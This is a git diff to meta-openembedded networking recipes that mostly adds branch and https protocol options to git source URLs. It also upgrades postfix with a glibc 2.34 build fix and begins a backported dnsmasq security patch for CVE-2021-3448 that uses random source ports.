--git a/meta-openembedded/meta-networking/recipes-connectivity/nanomsg/nanomsg_1.1.5.bb b/meta-openembedded/meta-networking/recipes-connectivity/nanomsg/nanomsg_1.1.5.bb index 8444f0b739..66a7aaa6b2 100644 --- a/meta-openembedded/meta-networking/recipes-connectivity/nanomsg/nanomsg_1.1.5.bb +++ b/meta-openembedded/meta-networking/recipes-connectivity/nanomsg/nanomsg_1.1.5.bb @@ -9,7 +9,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=587b3fd7fd291e418ff4d2b8f3904755" SECTION = "libs/networking" -SRC_URI = "git://github.com/nanomsg/nanomsg.git;protocol=https" +SRC_URI = "git://github.com/nanomsg/nanomsg.git;protocol=https;branch=master" SRCREV = "1749fd7b039165a91b8d556b4df18e3e632ad830" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-networking/recipes-connectivity/nanomsg/nng_1.2.5.bb b/meta-openembedded/meta-networking/recipes-connectivity/nanomsg/nng_1.2.5.bb index 77be27ffaa..6d035f4039 100644 --- a/meta-openembedded/meta-networking/recipes-connectivity/nanomsg/nng_1.2.5.bb +++ b/meta-openembedded/meta-networking/recipes-connectivity/nanomsg/nng_1.2.5.bb @@ -8,7 +8,7 @@ SECTION = "libs/networking" SRCREV = "53ae1a5ab37fdfc9ad5c236df3eaf4dd63f0fee9" -SRC_URI = "git://github.com/nanomsg/nng.git;branch=v1.2.x" +SRC_URI = "git://github.com/nanomsg/nng.git;branch=v1.2.x;protocol=https" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-networking/recipes-connectivity/netplan/netplan_0.98.bb b/meta-openembedded/meta-networking/recipes-connectivity/netplan/netplan_0.98.bb index 9f123c70fb..d91fc752e2 100644 --- a/meta-openembedded/meta-networking/recipes-connectivity/netplan/netplan_0.98.bb +++ b/meta-openembedded/meta-networking/recipes-connectivity/netplan/netplan_0.98.bb @@ -15,7 +15,7 @@ SRCREV = "5d22e9d22c4a3724d27b80b0cd9b898ae8f59d2b" PV = "0.98+git${SRCPV}" SRC_URI = " \ - git://github.com/CanonicalLtd/netplan.git \ + git://github.com/CanonicalLtd/netplan.git;branch=master;protocol=https \ " DEPENDS = "glib-2.0 libyaml ${@bb.utils.filter('DISTRO_FEATURES', 'systemd', d)}" diff --git a/meta-openembedded/meta-networking/recipes-connectivity/openconnect/openconnect_8.03.bb b/meta-openembedded/meta-networking/recipes-connectivity/openconnect/openconnect_8.03.bb index 597c1920cf..144afb4843 100644 --- a/meta-openembedded/meta-networking/recipes-connectivity/openconnect/openconnect_8.03.bb +++ b/meta-openembedded/meta-networking/recipes-connectivity/openconnect/openconnect_8.03.bb @@ -3,7 +3,7 @@ LICENSE = "LGPLv2.1" LIC_FILES_CHKSUM = "file://COPYING.LGPL;md5=243b725d71bb5df4a1e5920b344b86ad" SRC_URI = " \ - git://git.infradead.org/users/dwmw2/openconnect.git \ + git://git.infradead.org/users/dwmw2/openconnect.git;branch=master \ file://0001-trojans-tncc-wrapper.py-convert-to-python3.patch \ " SRCREV = "ea73851969ae7a6ea54fdd2d2b8c94776af24b2a" diff --git a/meta-openembedded/meta-networking/recipes-connectivity/relayd/relayd_git.bb b/meta-openembedded/meta-networking/recipes-connectivity/relayd/relayd_git.bb index e3134e41fc..a75b43e062 100644 --- a/meta-openembedded/meta-networking/recipes-connectivity/relayd/relayd_git.bb +++ b/meta-openembedded/meta-networking/recipes-connectivity/relayd/relayd_git.bb @@ -5,7 +5,7 @@ LIC_FILES_CHKSUM = "file://main.c;endline=17;md5=86aad799085683e0a2e1c2684a20bab DEPENDS = "libubox" -SRC_URI = "git://git.openwrt.org/project/relayd.git \ +SRC_URI = "git://git.openwrt.org/project/relayd.git;branch=master \ file://0001-rtnl_flush-Error-on-failed-write.patch \ " diff --git a/meta-openembedded/meta-networking/recipes-connectivity/vpnc/vpnc_0.5.3.bb b/meta-openembedded/meta-networking/recipes-connectivity/vpnc/vpnc_0.5.3.bb index 54e855a099..5d968f1476 100644 --- a/meta-openembedded/meta-networking/recipes-connectivity/vpnc/vpnc_0.5.3.bb +++ b/meta-openembedded/meta-networking/recipes-connectivity/vpnc/vpnc_0.5.3.bb @@ -9,7 +9,7 @@ DEPENDS += "libgcrypt" PV .= "r550-2jnpr1" SRCREV = "b1243d29e0c00312ead038b04a2cf5e2fa31d740" -SRC_URI = "git://github.com/ndpgroup/vpnc \ +SRC_URI = "git://github.com/ndpgroup/vpnc;branch=master;protocol=https \ file://long-help \ file://default.conf \ file://0001-search-for-log-help-in-build-dir.patch \ diff --git a/meta-openembedded/meta-networking/recipes-connectivity/wolfssl/wolfssl_4.4.0.bb b/meta-openembedded/meta-networking/recipes-connectivity/wolfssl/wolfssl_4.4.0.bb index db7b0d486b..b9c545e155 100644 --- a/meta-openembedded/meta-networking/recipes-connectivity/wolfssl/wolfssl_4.4.0.bb +++ b/meta-openembedded/meta-networking/recipes-connectivity/wolfssl/wolfssl_4.4.0.bb @@ -12,7 +12,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" PROVIDES += "cyassl" RPROVIDES_${PN} = "cyassl" -SRC_URI = "git://github.com/wolfSSL/wolfssl.git;protocol=https" +SRC_URI = "git://github.com/wolfSSL/wolfssl.git;protocol=https;branch=master" SRCREV = "e116c89a58af750421d82ece13f80516d2bde02e" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-networking/recipes-daemons/atftp/atftp_0.7.2.bb b/meta-openembedded/meta-networking/recipes-daemons/atftp/atftp_0.7.2.bb index ff9084dbf6..ddddb1b07a 100644 --- a/meta-openembedded/meta-networking/recipes-daemons/atftp/atftp_0.7.2.bb +++ b/meta-openembedded/meta-networking/recipes-daemons/atftp/atftp_0.7.2.bb @@ -6,7 +6,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=94d55d512a9ba36caa9b7df079bae19f" SRCREV = "52b71f0831dcbde508bd3a961d84abb80a62480f" -SRC_URI = "git://git.code.sf.net/p/atftp/code \ +SRC_URI = "git://git.code.sf.net/p/atftp/code;branch=master \ file://atftpd.init \ file://atftpd.service \ " diff --git a/meta-openembedded/meta-networking/recipes-daemons/cyrus-sasl/cyrus-sasl_2.1.27.bb b/meta-openembedded/meta-networking/recipes-daemons/cyrus-sasl/cyrus-sasl_2.1.27.bb index d3983eb1ae..db5f94444f 100644 --- a/meta-openembedded/meta-networking/recipes-daemons/cyrus-sasl/cyrus-sasl_2.1.27.bb +++ b/meta-openembedded/meta-networking/recipes-daemons/cyrus-sasl/cyrus-sasl_2.1.27.bb @@ -7,7 +7,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=3f55e0974e3d6db00ca6f57f2d206396" SRCREV = "e41cfb986c1b1935770de554872247453fdbb079" -SRC_URI = "git://github.com/cyrusimap/cyrus-sasl;protocol=https \ +SRC_URI = "git://github.com/cyrusimap/cyrus-sasl;protocol=https;branch=master \ file://avoid-to-call-AC_TRY_RUN.patch \ file://Fix-hardcoded-libdir.patch \ file://debian_patches_0014_avoid_pic_overwrite.diff \ diff --git a/meta-openembedded/meta-networking/recipes-daemons/iscsi-initiator-utils/iscsi-initiator-utils_2.1.3.bb b/meta-openembedded/meta-networking/recipes-daemons/iscsi-initiator-utils/iscsi-initiator-utils_2.1.3.bb index 4a9cf9db40..7cf8cfa94c 100644 --- a/meta-openembedded/meta-networking/recipes-daemons/iscsi-initiator-utils/iscsi-initiator-utils_2.1.3.bb +++ b/meta-openembedded/meta-networking/recipes-daemons/iscsi-initiator-utils/iscsi-initiator-utils_2.1.3.bb @@ -14,7 +14,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" SRCREV ?= "34e3ffb194f6fa3028c0eb2ff57e7db2d1026771" -SRC_URI = "git://github.com/open-iscsi/open-iscsi \ +SRC_URI = "git://github.com/open-iscsi/open-iscsi;branch=master;protocol=https \ file://0001-Makefile-Do-not-set-Werror.patch \ file://initd.debian \ file://99_iscsi-initiator-utils \ diff --git a/meta-openembedded/meta-networking/recipes-daemons/networkd-dispatcher/networkd-dispatcher_2.0.1.bb b/meta-openembedded/meta-networking/recipes-daemons/networkd-dispatcher/networkd-dispatcher_2.0.1.bb index 61d656b7ca..d5296f6a96 100644 --- a/meta-openembedded/meta-networking/recipes-daemons/networkd-dispatcher/networkd-dispatcher_2.0.1.bb +++ b/meta-openembedded/meta-networking/recipes-daemons/networkd-dispatcher/networkd-dispatcher_2.0.1.bb @@ -13,7 +13,7 @@ RDEPENDS_${PN} = "python3-pygobject python3-dbus" REQUIRED_DISTRO_FEATURES = "systemd" SRCREV = "333ef1ed1d7c7c17264fcf7629e5c2f78ab4112c" -SRC_URI = "git://gitlab.com/craftyguy/networkd-dispatcher;protocol=https" +SRC_URI = "git://gitlab.com/craftyguy/networkd-dispatcher;protocol=https;branch=master" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-networking/recipes-daemons/postfix/files/0001-fix-build-with-glibc-2.34.patch b/meta-openembedded/meta-networking/recipes-daemons/postfix/files/0001-fix-build-with-glibc-2.34.patch new file mode 100644 index 0000000000..b6ec8c70df --- /dev/null +++ b/meta-openembedded/meta-networking/recipes-daemons/postfix/files/0001-fix-build-with-glibc-2.34.patch @@ -0,0 +1,46 @@ +From 1f25dae3f38548bad32c5a3ebee4c07938d8c1b8 Mon Sep 17 00:00:00 2001 +From: Yi Zhao +Date: Thu, 30 Dec 2021 10:35:57 +0800 +Subject: [PATCH] fix build with glibc 2.34 +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +The closefrom() function which is introduced in glibc 2.34 conflicts +with the one provided by postfix. + +Fixes: +| In file included from attr_clnt.c:88: +| /usr/include/unistd.h:363:13: error: conflicting types for ‘closefrom’; have ‘void(int)’ +| 363 | extern void closefrom (int __lowfd) __THROW; +| | ^~~~~~~~~ +| In file included from attr_clnt.c:87: +| ./sys_defs.h:1506:12: note: previous declaration of ‘closefrom’ with type ‘int(int)’ +| 1506 | extern int closefrom(int); +| | ^~~~~~~~~ + +Upstream-Status: Backport +[https://github.com/vdukhovni/postfix/commit/3d966d3bd5f95b2c918aefb864549fa9f0442e24] + +Signed-off-by: Yi Zhao +--- + src/util/sys_defs.h | 3 +++ + 1 file changed, 3 insertions(+) + +diff --git a/src/util/sys_defs.h b/src/util/sys_defs.h +index 39daa16..5de5855 100644 +--- a/src/util/sys_defs.h ++++ b/src/util/sys_defs.h +@@ -827,6 +827,9 @@ extern int initgroups(const char *, int); + #define HAVE_POSIX_GETPW_R + #endif + #endif ++#if HAVE_GLIBC_API_VERSION_SUPPORT(2, 34) ++#define HAS_CLOSEFROM ++#endif + + #endif + +-- +2.17.1 + diff --git a/meta-openembedded/meta-networking/recipes-daemons/postfix/postfix_3.4.12.bb b/meta-openembedded/meta-networking/recipes-daemons/postfix/postfix_3.4.12.bb deleted file mode 100644 index db5b41bfbd..0000000000 --- a/meta-openembedded/meta-networking/recipes-daemons/postfix/postfix_3.4.12.bb +++ /dev/null @@ -1,18 +0,0 @@ -require postfix.inc - -SRC_URI += "ftp://ftp.porcupine.org/mirrors/postfix-release/official/postfix-${PV}.tar.gz \ - file://makedefs.patch \ - file://install.patch \ - file://main.cf \ - file://postfix \ - file://internal_recipient \ - file://postfix.service \ - file://aliasesdb \ - file://check_hostname.sh \ - file://0001-makedefs-Use-native-compiler-to-build-makedefs.test.patch \ - file://postfix-install.patch \ - file://icu-config.patch \ - file://0001-makedefs-add-lnsl-and-lresolv-to-SYSLIBS-by-default.patch \ - " -SRC_URI[sha256sum] = "18555183ae8b52a9e76067799279c86f9f2770cdef3836deb8462ee0a0855dec" -UPSTREAM_CHECK_REGEX = "postfix\-(?P3\.3(\.\d+)+).tar.gz" diff --git a/meta-openembedded/meta-networking/recipes-daemons/postfix/postfix_3.4.23.bb b/meta-openembedded/meta-networking/recipes-daemons/postfix/postfix_3.4.23.bb new file mode 100644 index 0000000000..bb66345805 --- /dev/null +++ b/meta-openembedded/meta-networking/recipes-daemons/postfix/postfix_3.4.23.bb @@ -0,0 +1,19 @@ +require postfix.inc + +SRC_URI += "ftp://ftp.porcupine.org/mirrors/postfix-release/official/postfix-${PV}.tar.gz \ + file://makedefs.patch \ + file://install.patch \ + file://main.cf \ + file://postfix \ + file://internal_recipient \ + file://postfix.service \ + file://aliasesdb \ + file://check_hostname.sh \ + file://0001-makedefs-Use-native-compiler-to-build-makedefs.test.patch \ + file://postfix-install.patch \ + file://icu-config.patch \ + file://0001-makedefs-add-lnsl-and-lresolv-to-SYSLIBS-by-default.patch \ + file://0001-fix-build-with-glibc-2.34.patch \ + " +SRC_URI[sha256sum] = "1759e953bf7baccb533899845c17753bf57a99ebac9c21717626262966a122f9" +UPSTREAM_CHECK_REGEX = "postfix\-(?P3\.4(\.\d+)+).tar.gz" diff --git a/meta-openembedded/meta-networking/recipes-filter/arno-iptables-firewall/arno-iptables-firewall_2.1.0.bb b/meta-openembedded/meta-networking/recipes-filter/arno-iptables-firewall/arno-iptables-firewall_2.1.0.bb index 115353fec7..071002c5e7 100644 --- a/meta-openembedded/meta-networking/recipes-filter/arno-iptables-firewall/arno-iptables-firewall_2.1.0.bb +++ b/meta-openembedded/meta-networking/recipes-filter/arno-iptables-firewall/arno-iptables-firewall_2.1.0.bb @@ -5,7 +5,7 @@ LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://gpl_license.txt;md5=11c7b65c4a4acb9d5175f7e9bf99c403" SRCREV = "39276d14b659684c4c0612725ab83ea841c6ef99" -SRC_URI = "git://github.com/arno-iptables-firewall/aif" +SRC_URI = "git://github.com/arno-iptables-firewall/aif;branch=master;protocol=https" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-networking/recipes-filter/libnetfilter/libnetfilter-log_1.0.1.bb b/meta-openembedded/meta-networking/recipes-filter/libnetfilter/libnetfilter-log_1.0.1.bb index 2f627d458e..994825cb7e 100644 --- a/meta-openembedded/meta-networking/recipes-filter/libnetfilter/libnetfilter-log_1.0.1.bb +++ b/meta-openembedded/meta-networking/recipes-filter/libnetfilter/libnetfilter-log_1.0.1.bb @@ -8,7 +8,7 @@ DEPENDS = "libnfnetlink libmnl" SRCREV = "ba196a97e810746e5660fe3f57c87c0ed0f2b324" PV .= "+git${SRCPV}" -SRC_URI = "git://git.netfilter.org/libnetfilter_log" +SRC_URI = "git://git.netfilter.org/libnetfilter_log;branch=master" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-networking/recipes-filter/libnetfilter/libnetfilter-queue_1.0.3.bb b/meta-openembedded/meta-networking/recipes-filter/libnetfilter/libnetfilter-queue_1.0.3.bb index 896cfdfaa4..1bbab6f3cb 100644 --- a/meta-openembedded/meta-networking/recipes-filter/libnetfilter/libnetfilter-queue_1.0.3.bb +++ b/meta-openembedded/meta-networking/recipes-filter/libnetfilter/libnetfilter-queue_1.0.3.bb @@ -8,7 +8,7 @@ DEPENDS = "libnfnetlink libmnl" SRCREV = "601abd1c71ccdf90753cf294c120ad43fb25dc54" -SRC_URI = "git://git.netfilter.org/libnetfilter_queue \ +SRC_URI = "git://git.netfilter.org/libnetfilter_queue;branch=master \ file://0001-libnetfilter-queue-Declare-the-define-visivility-attribute-together.patch \ " diff --git a/meta-openembedded/meta-networking/recipes-filter/libnftnl/libnftnl_1.1.7.bb b/meta-openembedded/meta-networking/recipes-filter/libnftnl/libnftnl_1.1.7.bb index 4ff00bf873..fee9967ebd 100644 --- a/meta-openembedded/meta-networking/recipes-filter/libnftnl/libnftnl_1.1.7.bb +++ b/meta-openembedded/meta-networking/recipes-filter/libnftnl/libnftnl_1.1.7.bb @@ -5,7 +5,7 @@ SECTION = "libs" DEPENDS = "libmnl" SRCREV = "eedafeb6db330b8adff1b7cdd3dac325f9144195" -SRC_URI = "git://git.netfilter.org/libnftnl \ +SRC_URI = "git://git.netfilter.org/libnftnl;branch=master \ file://0001-avoid-naming-local-function-as-one-of-printf-family.patch \ " diff --git a/meta-openembedded/meta-networking/recipes-irc/znc/znc_1.7.5.bb b/meta-openembedded/meta-networking/recipes-irc/znc/znc_1.7.5.bb index a3d4b7cc55..d7467ff4a6 100644 --- a/meta-openembedded/meta-networking/recipes-irc/znc/znc_1.7.5.bb +++ b/meta-openembedded/meta-networking/recipes-irc/znc/znc_1.7.5.bb @@ -5,8 +5,8 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=3b83ef96387f14655fc854ddc3c6bd57" DEPENDS = "openssl zlib icu" -SRC_URI = "git://github.com/znc/znc.git;name=znc \ - git://github.com/jimloco/Csocket.git;destsuffix=git/third_party/Csocket;name=Csocket \ +SRC_URI = "git://github.com/znc/znc.git;name=znc;branch=master;protocol=https \ + git://github.com/jimloco/Csocket.git;destsuffix=git/third_party/Csocket;name=Csocket;branch=master;protocol=https \ " SRCREV_znc = "c7f72f8bc800115ac985e7e13eace78031cb1b50" SRCREV_Csocket = "e8d9e0bb248c521c2c7fa01e1c6a116d929c41b4" diff --git a/meta-openembedded/meta-networking/recipes-kernel/wireguard/wireguard-module_1.0.20200401.bb b/meta-openembedded/meta-networking/recipes-kernel/wireguard/wireguard-module_1.0.20200401.bb index 6ed988bafa..9215f4a6d8 100644 --- a/meta-openembedded/meta-networking/recipes-kernel/wireguard/wireguard-module_1.0.20200401.bb +++ b/meta-openembedded/meta-networking/recipes-kernel/wireguard/wireguard-module_1.0.20200401.bb @@ -2,7 +2,7 @@ require wireguard.inc SRCREV = "43f57dac7b8305024f83addc533c9eede6509129" -SRC_URI = "git://git.zx2c4.com/wireguard-linux-compat \ +SRC_URI = "git://git.zx2c4.com/wireguard-linux-compat;branch=master \ file://0001-compat-SYM_FUNC_-START-END-were-backported-to-5.4.patch \ file://0001-compat-icmp_ndo_send-functions-were-backported-exten.patch " diff --git a/meta-openembedded/meta-networking/recipes-kernel/wireguard/wireguard-tools_1.0.20200319.bb b/meta-openembedded/meta-networking/recipes-kernel/wireguard/wireguard-tools_1.0.20200319.bb index f698b9a9af..9e486ecc34 100644 --- a/meta-openembedded/meta-networking/recipes-kernel/wireguard/wireguard-tools_1.0.20200319.bb +++ b/meta-openembedded/meta-networking/recipes-kernel/wireguard/wireguard-tools_1.0.20200319.bb @@ -1,7 +1,7 @@ require wireguard.inc SRCREV = "a8063adc8ae9b4fc9848500e93f94bee8ad2e585" -SRC_URI = "git://git.zx2c4.com/wireguard-tools" +SRC_URI = "git://git.zx2c4.com/wireguard-tools;branch=master" inherit bash-completion systemd pkgconfig diff --git a/meta-openembedded/meta-networking/recipes-protocols/babeld/babeld_1.9.1.bb b/meta-openembedded/meta-networking/recipes-protocols/babeld/babeld_1.9.1.bb index 6dd15ad9fc..fdcd906516 100644 --- a/meta-openembedded/meta-networking/recipes-protocols/babeld/babeld_1.9.1.bb +++ b/meta-openembedded/meta-networking/recipes-protocols/babeld/babeld_1.9.1.bb @@ -12,7 +12,7 @@ SECTION = "net" LICENSE = "MIT" LIC_FILES_CHKSUM = "file://LICENCE;md5=411a48ac3c2e9e0911b8dd9aed26f754" -SRC_URI = "git://github.com/jech/babeld.git;protocol=git" +SRC_URI = "git://github.com/jech/babeld.git;protocol=https;branch=master" SRCREV = "0835d5d894ea016ab7b81562466cade2c51a12d4" UPSTREAM_CHECK_GITTAGREGEX = "babeld-(?P\d+(\.\d+)+)" diff --git a/meta-openembedded/meta-networking/recipes-protocols/openflow/openflow.inc b/meta-openembedded/meta-networking/recipes-protocols/openflow/openflow.inc index cccbfa19a6..ab538c620e 100644 --- a/meta-openembedded/meta-networking/recipes-protocols/openflow/openflow.inc +++ b/meta-openembedded/meta-networking/recipes-protocols/openflow/openflow.inc @@ -11,7 +11,7 @@ LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=e870c934e2c3d6ccf085fd7cf0a1e2e2" -SRC_URI = "git://gitosis.stanford.edu/openflow.git;protocol=git" +SRC_URI = "git://gitosis.stanford.edu/openflow.git;protocol=git;branch=master" DEPENDS = "virtual/libc" diff --git a/meta-openembedded/meta-networking/recipes-protocols/xl2tpd/xl2tpd_1.3.14.bb b/meta-openembedded/meta-networking/recipes-protocols/xl2tpd/xl2tpd_1.3.14.bb index b02e183db7..181698d778 100644 --- a/meta-openembedded/meta-networking/recipes-protocols/xl2tpd/xl2tpd_1.3.14.bb +++ b/meta-openembedded/meta-networking/recipes-protocols/xl2tpd/xl2tpd_1.3.14.bb @@ -8,7 +8,7 @@ PACKAGE_ARCH = "${MACHINE_ARCH}" LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://LICENSE;md5=b234ee4d69f5fce4486a80fdaf4a4263" -SRC_URI = "git://github.com/xelerance/xl2tpd.git" +SRC_URI = "git://github.com/xelerance/xl2tpd.git;branch=master;protocol=https" SRCREV = "ba619c79c4790c78c033df0abde4a9a5de744a08" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-networking/recipes-support/arptables/arptables_git.bb b/meta-openembedded/meta-networking/recipes-support/arptables/arptables_git.bb index c02a19944d..b59dc4ca1b 100644 --- a/meta-openembedded/meta-networking/recipes-support/arptables/arptables_git.bb +++ b/meta-openembedded/meta-networking/recipes-support/arptables/arptables_git.bb @@ -6,7 +6,7 @@ SRCREV = "efae8949e31f8b2eb6290f377a28384cecaf105a" PV = "0.0.5+git${SRCPV}" SRC_URI = " \ - git://git.netfilter.org/arptables \ + git://git.netfilter.org/arptables;branch=master \ file://0001-Use-ARPCFLAGS-for-package-specific-compiler-flags.patch \ file://arptables-arpt-get-target-fix.patch \ file://arptables.service \ diff --git a/meta-openembedded/meta-networking/recipes-support/bridge-utils/bridge-utils_1.6.bb b/meta-openembedded/meta-networking/recipes-support/bridge-utils/bridge-utils_1.6.bb index 1c87c48bfa..d693ae9a93 100644 --- a/meta-openembedded/meta-networking/recipes-support/bridge-utils/bridge-utils_1.6.bb +++ b/meta-openembedded/meta-networking/recipes-support/bridge-utils/bridge-utils_1.6.bb @@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=f9d20a453221a1b7e32ae84694da2c37" SRCREV = "42c1aefc303fdf891fbb099ea51f00dca83ab606" SRC_URI = "\ - git://git.kernel.org/pub/scm/linux/kernel/git/shemminger/bridge-utils.git \ + git://git.kernel.org/pub/scm/linux/kernel/git/shemminger/bridge-utils.git;branch=master \ file://kernel-headers.patch \ file://0005-build-don-t-ignore-CFLAGS-from-environment.patch \ file://0006-libbridge-Modifying-the-AR-to-cross-toolchain.patch \ diff --git a/meta-openembedded/meta-networking/recipes-support/cifs/cifs-utils_6.10.bb b/meta-openembedded/meta-networking/recipes-support/cifs/cifs-utils_6.10.bb index 8d82ee4546..e76481cc1b 100644 --- a/meta-openembedded/meta-networking/recipes-support/cifs/cifs-utils_6.10.bb +++ b/meta-openembedded/meta-networking/recipes-support/cifs/cifs-utils_6.10.bb @@ -7,7 +7,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504" PV = "6.10" SRCREV = "5ff5fc2ecc10353fd39ad508db5c2828fd2d8d9a" -SRC_URI = "git://git.samba.org/cifs-utils.git" +SRC_URI = "git://git.samba.org/cifs-utils.git;branch=master" S = "${WORKDIR}/git" DEPENDS += "libtalloc" diff --git a/meta-openembedded/meta-networking/recipes-support/curlpp/curlpp_0.8.1.bb b/meta-openembedded/meta-networking/recipes-support/curlpp/curlpp_0.8.1.bb index 799cf8611c..3da651c478 100644 --- a/meta-openembedded/meta-networking/recipes-support/curlpp/curlpp_0.8.1.bb +++ b/meta-openembedded/meta-networking/recipes-support/curlpp/curlpp_0.8.1.bb @@ -7,7 +7,7 @@ LIC_FILES_CHKSUM = "file://doc/LICENSE;md5=fd0c9adf285a69aa3b4faf34384e1029" DEPENDS = "curl" DEPENDS_class-native = "curl-native" -SRC_URI = "git://github.com/jpbarrette/curlpp.git" +SRC_URI = "git://github.com/jpbarrette/curlpp.git;branch=master;protocol=https" SRCREV = "592552a165cc569dac7674cb7fc9de3dc829906f" diff --git a/meta-openembedded/meta-networking/recipes-support/dnsmasq/dnsmasq/CVE-2021-3448.patch b/meta-openembedded/meta-networking/recipes-support/dnsmasq/dnsmasq/CVE-2021-3448.patch new file mode 100644 index 0000000000..360931a83b --- /dev/null +++ b/meta-openembedded/meta-networking/recipes-support/dnsmasq/dnsmasq/CVE-2021-3448.patch @@ -0,0 +1,1040 @@ +From 74d4fcd756a85bc1823232ea74334f7ccfb9d5d2 Mon Sep 17 00:00:00 2001 +From: Simon Kelley +Date: Mon, 15 Mar 2021 21:59:51 +0000 +Subject: [PATCH] Use random source ports where possible if source + addresses/interfaces in use. + +CVE-2021-3448 applies. + +It's possible to specify the source address or interface to be +used when contacting upstream nameservers: server=8.8.8.8@1.2.3.4 +or server=8.8.8.8@1.2.3.4#66 or server=8.8.8.8@eth0, and all of +these have, until now, used a single socket, bound to a fixed +port. This was originally done to allow an error (non-existent +interface, or non-local address) to be detected at start-up. This +means that any upstream servers specified in such a way don't use +random source ports, and are more susceptible to cache-poisoning +attacks. + +We now use random ports where possible, even when the +source is specified, so server=8.8.8.8@1.2.3.4 or +server=8.8.8.8@eth0 will use random source +ports. server=8.8.8.8@1.2.3.4#66 or any use of --query-port will +use the explicitly configured port, and should only be done with +understanding of the security implications. +Note that this change changes non-existing interface, or non-local +source address errors from fatal to run-time. The error will be +logged and communiction with the server not possible. + +Upstream-Status: Backport +CVE: CVE-2021-3448 +Signed-off-by: Armin Kuster + +--- + CHANGELOG | 22 +++ + man/dnsmasq.8 | 4 +- + src/dnsmasq.c | 31 ++-- + src/dnsmasq.h | 26 ++-- + src/forward.c | 392 ++++++++++++++++++++++++++++++-------------------- + src/loop.c | 20 +-- + src/network.c | 110 +++++--------- + src/option.c | 3 +- + src/tftp.c | 6 +- + src/util.c | 2 +- + 10 files changed, 344 insertions(+), 272 deletions(-) + +Index: dnsmasq-2.81/man/dnsmasq.8 +=================================================================== +--- dnsmasq-2.81.orig/man/dnsmasq.8 ++++ dnsmasq-2.81/man/dnsmasq.8 +@@ -489,7 +489,7 @@ source address specified but the port ma + part of the source address. Forcing queries to an interface is not + implemented on all platforms supported by dnsmasq. + .TP +-.B --rev-server=/[,][#][@|[#]] ++.B --rev-server=/[,][#][@][@[#]] + This is functionally the same as + .B --server, + but provides some syntactic sugar to make specifying address-to-name queries easier. For example +Index: dnsmasq-2.81/src/dnsmasq.c +=================================================================== +--- dnsmasq-2.81.orig/src/dnsmasq.c ++++ dnsmasq-2.81/src/dnsmasq.c +@@ -1668,6 +1668,7 @@ static int set_dns_listeners(time_t now) + { + struct serverfd *serverfdp; + struct listener *listener; ++ struct randfd_list *rfl; + int wait = 0, i; + + #ifdef HAVE_TFTP +@@ -1688,11 +1689,14 @@ static int set_dns_listeners(time_t now) + for (serverfdp = daemon->sfds; serverfdp; serverfdp = serverfdp->next) + poll_listen(serverfdp->fd, POLLIN); + +- if (daemon->port != 0 && !daemon->osport) +- for (i = 0; i < RANDOM_SOCKS; i++) +- if (daemon->randomsocks[i].refcount != 0) +- poll_listen(daemon->randomsocks[i].fd, POLLIN); +- ++ for (i = 0; i < RANDOM_SOCKS; i++) ++ if (daemon->randomsocks[i].refcount != 0) ++ poll_listen(daemon->randomsocks[i].fd, POLLIN); ++ ++ /* Check overflow random sockets too. */ ++ for (rfl = daemon->rfl_poll; rfl; rfl = rfl->next) ++ poll_listen(rfl->rfd->fd, POLLIN); ++ + for (listener = daemon->listeners; listener; listener = listener->next) + { + /* only listen for queries if we have resources */ +@@ -1729,18 +1733,23 @@ static void check_dns_listeners(time_t n + { + struct serverfd *serverfdp; + struct listener *listener; ++ struct randfd_list *rfl; + int i; + int pipefd[2]; + + for (serverfdp = daemon->sfds; serverfdp; serverfdp = serverfdp->next) + if (poll_check(serverfdp->fd, POLLIN)) +- reply_query(serverfdp->fd, serverfdp->source_addr.sa.sa_family, now); ++ reply_query(serverfdp->fd, now); + +- if (daemon->port != 0 && !daemon->osport) +- for (i = 0; i < RANDOM_SOCKS; i++) +- if (daemon->randomsocks[i].refcount != 0 && +- poll_check(daemon->randomsocks[i].fd, POLLIN)) +- reply_query(daemon->randomsocks[i].fd, daemon->randomsocks[i].family, now); ++ for (i = 0; i < RANDOM_SOCKS; i++) ++ if (daemon->randomsocks[i].refcount != 0 && ++ poll_check(daemon->randomsocks[i].fd, POLLIN)) ++ reply_query(daemon->randomsocks[i].fd, now); ++ ++ /* Check overflow random sockets too. */ ++ for (rfl = daemon->rfl_poll; rfl; rfl = rfl->next) ++ if (poll_check(rfl->rfd->fd, POLLIN)) ++ reply_query(rfl->rfd->fd, now); + + /* Races. The child process can die before we read all of the data from the + pipe, or vice versa. Therefore send tcp_pids to zero when we wait() the +Index: dnsmasq-2.81/src/dnsmasq.h +=================================================================== +--- dnsmasq-2.81.orig/src/dnsmasq.h ++++ dnsmasq-2.81/src/dnsmasq.h +@@ -542,13 +542,20 @@ struct serverfd { + }; + + struct randfd { ++ struct server *serv; + int fd; +- unsigned short refcount, family; ++ unsigned short refcount; /* refcount == 0xffff means overflow record. */ + }; +- ++ ++struct randfd_list { ++ struct randfd *rfd; ++ struct randfd_list *next; ++}; ++ + struct server { + union mysockaddr addr, source_addr; + char interface[IF_NAMESIZE+1]; ++ unsigned int ifindex; /* corresponding to interface, above */ + struct serverfd *sfd; + char *domain; /* set if this server only handles a domain. */ + int flags, tcpfd, edns_pktsz; +@@ -669,8 +676,7 @@ struct frec { + struct frec_src *next; + } frec_src; + struct server *sentto; /* NULL means free */ +- struct randfd *rfd4; +- struct randfd *rfd6; ++ struct randfd_list *rfds; + unsigned short new_id; + int fd, forwardall, flags; + time_t time; 